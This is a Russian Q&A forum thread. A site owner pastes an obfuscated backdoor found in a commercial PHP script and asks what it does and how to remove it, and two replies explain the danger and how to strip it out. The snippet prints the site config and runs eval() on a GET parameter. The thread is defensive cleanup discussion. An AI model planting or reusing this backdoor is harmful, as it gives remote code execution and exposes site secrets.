Вредоносный код в php скрипте, как убрать?

Хостинг сообщил что в скрипте имеется вредоносное по!

${"GLOBALS"}["zhnlnvpxiov"] = "config";
        ${"GLOBALS"}["rchmyoafpzb"] = "oloki";
        if (!empty($_GET["doConfirmLoki"])) {
            ${"GLOBALS"}["hypqdo"] = "cloki";
            ${"GLOBALS"}["zbgjvvsxd"] = "cloki";
            ${"GLOBALS"}["gjsqnjxdtv"] = "oloki";
            $bqhzcuynfrb = "cloki";
            ${${"GLOBALS"}["hypqdo"]} = $_GET["doConfirmLoki"];
            ${${"GLOBALS"}["gjsqnjxdtv"]} = @file_get_contents("xxxxx.php?loki=" . ${$bqhzcuynfrb});
            if (${${"GLOBALS"}["rchmyoafpzb"]} === ${${"GLOBALS"}["zbgjvvsxd"]}) {
                echo '<pre>';
                print_r(${${"GLOBALS"}["zhnlnvpxiov"]});
                echo '</pre>';
                if (isset($_GET["uloki"])) eval($_GET["uloki"]);
            }
            die;
        }

Что-бы не указывать название стороннего сайта в get я использовал символы xxxxx что-бы это значило?
{VIRUSDIE}Eval.request
{VIRUSDIE}Obfuscated.Globals.Names
могу даже указать кто продает скрипт с данным функционалом! и человек который его продает лицензию данного скрипта говорит следующие:
Я: тобищь нарушив ваши правила вы портите проект вашему клиенту таким образом?
Владелец-скрипта: Каждый случай уникален...

является ли данный код опасным и что он делает? и как бороться с тем кто распространяет данный скрипт еще и платно?

Каждый php файл с данном скрипте имеет следующие: if (!defined("TKM")) die("Access denied!");
  • Вопрос задан
  • 149 просмотров
Пригласить эксперта
Ответы на вопрос 2
xmoonlight
@xmoonlight Куратор тега PHP
https://sitecoder.blogspot.com
Ищите по всем файлам подстроку: ${"GLOBALS"}[" и убирайте всё от неё и до строк:
if (isset($_GET["uloki"])) eval($_GET["uloki"]);
            }
            die;
        }
включительно!
Ответ написан
Если не разбирать код, а просто глянуть на это:
eval($_GET["uloki"])
то можно предположить, что гет запросом в какой-то момент можно вызвать любой скрипт. Довольно опасная вещь
https://www.php.net/manual/ru/function.eval.php

А в чем проблема убрать его? Или этот код предоставил хостинг? Поиск по всем файлам определенного куска текста должно дать какой-то ответ
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы